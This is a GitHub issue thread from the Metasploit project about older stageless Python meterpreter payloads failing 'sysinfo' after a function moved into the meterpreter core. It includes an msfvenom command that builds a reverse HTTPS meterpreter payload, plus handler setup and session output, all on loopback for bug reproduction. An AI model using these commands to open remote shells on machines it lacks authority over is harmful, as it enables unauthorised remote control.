### ISSUE TITLE
Previously build python meterpreter payload fails sysinfo

### ISSUE THREAD

**Issue by jmartin-r7** [rapid7/metasploit-framework#8140]
## Steps to reproduce

using previously created python meterpreter (example was created with framework on 11-Jan-2017)
```
./msfvenom -p python/meterpreter_reverse_https LHOST=127.0.0.1 LPORT=8443 > metPy_127_8443
python metPy_127_8443
```

execute following:

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload multi/meterpreter/reverse_http
set payload multi/meterpreter/reverse_http   set payload multi/meterpreter/reverse_https  
msf exploit(handler) > set payload multi/meterpreter/reverse_https
payload => multi/meterpreter/reverse_https
msf exploit(handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > run -j
[*] Exploit running as background job.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:8443
msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) > 
[*] https://127.0.0.1:8443 handling request from 127.0.0.1; (UUID: jycelexv) Redirecting stageless connection from /xnE-oFt1ipRiBncSOnA6RgdT2SVGq275DYC with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://127.0.0.1:8443 handling request from 127.0.0.1; (UUID: jycelexv) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (127.0.0.1:8443 -> 127.0.0.1:64167) at 2017-03-21 17:11:03 -0500
sessions -v

Active sessions
===============

  Session ID: 2
        Type: meterpreter python
        Info: 
      Tunnel: 127.0.0.1:8443 -> 127.0.0.1:64167 (127.0.0.1)
         Via: exploit/multi/handler
        UUID: c6713ea05b758a94/python=20/python=21/2017-01-11T16:07:28Z
   MachineID: ff92598af852dbc415c540e56a2d1e37
     CheckIn: 0s ago @ 2017-03-21 17:11:13 -0500
  Registered: No



msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
[-] stdapi_sys_config_sysinfo: Operation failed: Python exception: NameError
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(handler) > exit
```

## Expected behavior

Older python payload should be compatible with current framework instance

## Current behavior

sysinfo fails and sessions details are missing "Info" label, usually <user> @ <hostname>

## System stuff
Python 2.7.10 (system default)

### Metasploit version
metasploit v4.14.3-dev-5a1c7ca 

### I installed Metasploit with:
- [x] Source install (rvm managed 2.3.3)

### OS
macOS 10.12.3

**Comment by bwatters-r7** [comment]
Honestly, given some of the changes that @zeroSteiner made to the python meterpreter and msfconsole, it would not shock me to discover this might be broken.  I'll try and look closer later

**Comment by zeroSteiner** [comment]
@bwatters-r7 this appears to be due to commit [f1be7b2b](https://github.com/rapid7/metasploit-payloads/commit/f1be7b2b0b32b7997682b2790d8ba2acd1fecc2a) where the `get_system_arch` function was moved from the stdapi extension and into the meterpreter core. The stageless meterpreter that was generated on January does not include the stdapi extension or export that function, so when the session is opened and the extension is loaded, that function is unavailable.

Output with `PythonMeterpreterDebug=true` when generating the stage from Jan-11-2017. Reproduced with Python 2.7.11 on Linux x64.
```
python metPy_127_8443
[*] running method core_patch_url                                                                                                                                                                                                             
[*] running method core_machine_id
[*] running method core_enumextcmd
[*] running method core_loadlib
[*] running method stdapi_sys_config_getuid
[*] running method stdapi_sys_config_sysinfo
[-] method stdapi_sys_config_sysinfo resulted in an error
Traceback (most recent call last):
  File "<string>", line 1121, in create_response
  File "", line 890, in stdapi_sys_config_sysinfo
NameError: global name 'get_system_arch' is not defined
```

Simply copying and pasting the `get_system_arch` function from the meterpreter core into the stdapi extension should fix the issue.

**Comment by itsmeroy2012** [comment]
Has this been already fixed, because it doesn't cause any problem when I run it.  @jmartin-r7 @zeroSteiner 

![screenshot from 2017-03-25 22-19-18](https://cloud.githubusercontent.com/assets/20739241/24324264/5893495e-11a9-11e7-919b-007578e3d5d1.png)

**Comment by zeroSteiner** [comment]
@itsmeroy2012 I don't believe it's been fixed yet. Based on your screenshot though, you're not experiencing the issue because you're using the staged version. In the staged version the meterpreter core and stdapi will both be the same version as your metasploit instance. This bug will surface when the meterpreter core is older than the version of stdapi that gets loaded.

To recreate this issue you need to go back to an old version of Metasploit, circa mid-January 2017 (or at least prior to the aforementioned commit) and generate a non-staged version such as `python/meterpreter_reverse_https` and then update your version of Metasploit and attempt to get a session.

**Comment by itsmeroy2012** [comment]
I have somewhat fixed the issue but the file 'ext_server_stdapi.py' and 'meterpreter.py' doesn't seem to exist in the repository in github but only in my local directory. What am I supposed to do? @zeroSteiner

**Comment by timwr** [comment]
https://github.com/rapid7/metasploit-payloads/tree/master/python/meterpreter

**Comment by busterb** [comment]
It doesn't appear that there is a nice fix for this, that doesn't involve doing something gross to deal with an edge condition. Next time, we'll just either try to avoid introducing an incompatibility, or add a version indicator to indicate no backward compat (we have done that 2 times already, and will probably do it again this year).
